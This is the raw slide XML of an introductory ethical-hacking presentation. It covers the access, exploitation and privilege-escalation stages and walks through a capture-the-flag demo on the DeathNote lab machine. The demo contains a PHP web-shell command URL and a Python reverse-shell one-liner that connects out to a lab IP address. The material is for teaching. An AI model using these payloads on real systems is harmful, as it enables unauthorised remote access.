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7.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2.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2"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="277" r:id="rId5"/>
    <p:sldId id="278" r:id="rId6"/>
    <p:sldId id="279" r:id="rId7"/>
    <p:sldId id="281" r:id="rId8"/>
    <p:sldId id="282" r:id="rId9"/>
    <p:sldId id="283" r:id="rId10"/>
    <p:sldId id="284" r:id="rId11"/>
    <p:sldId id="285" r:id="rId12"/>
    <p:sldId id="286" r:id="rId13"/>
    <p:sldId id="287" r:id="rId14"/>
    <p:sldId id="289" r:id="rId15"/>
    <p:sldId id="288" r:id="rId16"/>
    <p:sldId id="290" r:id="rId17"/>
    <p:sldId id="291" r:id="rId18"/>
    <p:sldId id="314" r:id="rId19"/>
    <p:sldId id="302" r:id="rId20"/>
    <p:sldId id="316" r:id="rId21"/>
    <p:sldId id="306" r:id="rId22"/>
    <p:sldId id="308" r:id="rId23"/>
    <p:sldId id="309" r:id="rId24"/>
    <p:sldId id="317" r:id="rId25"/>
    <p:sldId id="318" r:id="rId26"/>
    <p:sldId id="319" r:id="rId27"/>
    <p:sldId id="320" r:id="rId28"/>
    <p:sldId id="311" r:id="rId29"/>
    <p:sldId id="312" r:id="rId30"/>
    <p:sldId id="31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0" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="-318"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3/20/2022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‹N°›</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46CEE3-4835-4F73-BA0B-02C09C038718}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243836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46CEE3-4835-4F73-BA0B-02C09C038718}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3555689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46CEE3-4835-4F73-BA0B-02C09C038718}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217499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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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3/20/2022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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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smtClean="0"/>
              <a:t>Cliquez sur l'icône pour ajouter une image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8A1558FF-9F53-4DAD-84A1-1EEE4F190FF1}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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78FA1A6-D89D-4E0B-ACDC-F92429034F56}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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smtClean="0"/>
              <a:t>Modifiez le style du titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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BA382F0-6EA8-4D82-951F-1579D6A93CC4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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BE913C-F349-4CE3-A910-0EA13427FE0D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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smtClean="0"/>
              <a:t>Modifiez le style du titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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70D4C5C7-4D27-4EBE-9DB8-92F5F0F40B34}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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CDAF82-EDB2-4FBF-83F4-247A1B3455CB}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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2D5E59DB-4C5A-44A3-897C-FF6803F94296}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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8" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="609600"/>
            <a:ext cx="10131425" cy="1456267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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E9F6B6E0-E0F8-4800-BD74-7D33DFE5ED7E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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6E6DC824-D0E7-4046-8B44-4AAD1C4DE2CF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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FEFC221C-17A4-4F42-9F54-9F7E03AA1BBB}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/20/2022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sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685802" y="2142067"/>
            <a:ext cx="4995334" cy="3649134"/>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Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821895" y="2142067"/>
            <a:ext cx="4995332" cy="3649133"/>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Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{38CD7CBA-5256-42F3-BAB5-33F095514AE3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8EB80C04-2E33-403B-B014-7E203A57326C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/20/2022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8C92A49D-7D7F-4D69-A8AA-65D6B58C15F2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/20/2022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3/20/2022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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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2E8BBFA8-C775-4121-A7F6-6851C8035873}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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smtClean="0"/>
              <a:t>Cliquez sur l'icône pour ajouter une image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6EC01760-8EEC-4A4C-BD0D-3CDAAA80A266}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/20/2022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fr-FR" smtClean="0"/>
              <a:t>Modifiez le style du titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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3/20/2022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Rectangle 88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D1E5586-8BB5-40F6-96C3-2E87DD7CE5C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0" y="1"/>
            <a:ext cx="12370866" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-522515" y="1764192"/>
            <a:ext cx="6096000" cy="4462760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Your guide to know</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is real</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0" smtClean="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hamza Elansari</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		Cyber security content creator</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>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Gaining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> System  Access </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="10298873" cy="3819346"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>For the automated exploitation you have to be familiar with some scripting language such as: python, bash, go ..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>However you can use tools for exploitation in case you found famous CVE recorded in a exploitation tool like metasploit framework, in other hand most of CVEs has already exploits you will find them on exploit-db or GitHub ..</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="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2680105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Gaining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> System  Access </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685802" y="2142067"/>
            <a:ext cx="3969326" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>But do not be script Kidde</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>never and ever !!</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="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91" y="1916876"/>
            <a:ext cx="3914214" cy="3914214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128284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Privileges </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> escalation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685802" y="2142067"/>
            <a:ext cx="6760028" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is the final and the super hard stage you will facing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We know that the server has many users, so your goal now it’s to escalate from normal user to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is a big sea and there are non limited ways to do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>┌──(root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>💀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kali)-[~]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>└─# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	root</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="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25841871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95801" y="2392118"/>
            <a:ext cx="10131425" cy="1312984"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Let’s get to the nerdy  part</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5956214" y="1886542"/>
            <a:ext cx="1122423" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Kristen ITC" panose="03050502040202030202" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>fun </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Kristen ITC" panose="03050502040202030202" pitchFamily="66" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Connecteur droit 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5914855" y="2743199"/>
            <a:ext cx="1163782" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>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8" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495801" y="2224918"/>
            <a:ext cx="10131425"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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>We gonna play a simple CTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>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432624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CAPTUR  THE  FLAG - ctf</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"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922" y="1785277"/>
            <a:ext cx="8827977" cy="4408519"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>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5944664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18310" y="1667054"/>
            <a:ext cx="10131425" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Steganography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="914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7840" y="1132141"/>
            <a:ext cx="6428020" cy="5293023"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="732311" y="220131"/>
            <a:ext cx="7592292" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>┌──(root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>💀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kali)-[~]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>└─# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>wget http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://192.168.43.50/DeathNote/deathnote/img/reuzaci.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6392278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18310" y="1667054"/>
            <a:ext cx="10131425" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Web Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192688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38300" y="538898"/>
            <a:ext cx="10131425" cy="2394307"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The shell uploaded link will be shown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>192.168.43.50/DeathNote/deathnote/test.php?cmd=whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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97" y="2779710"/>
            <a:ext cx="10058400" cy="2462522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41112411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50175" y="455771"/>
            <a:ext cx="11403280" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reverse shell payload using python:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.43.137",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>")‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" inden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99" y="2695604"/>
            <a:ext cx="9485715" cy="3438095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
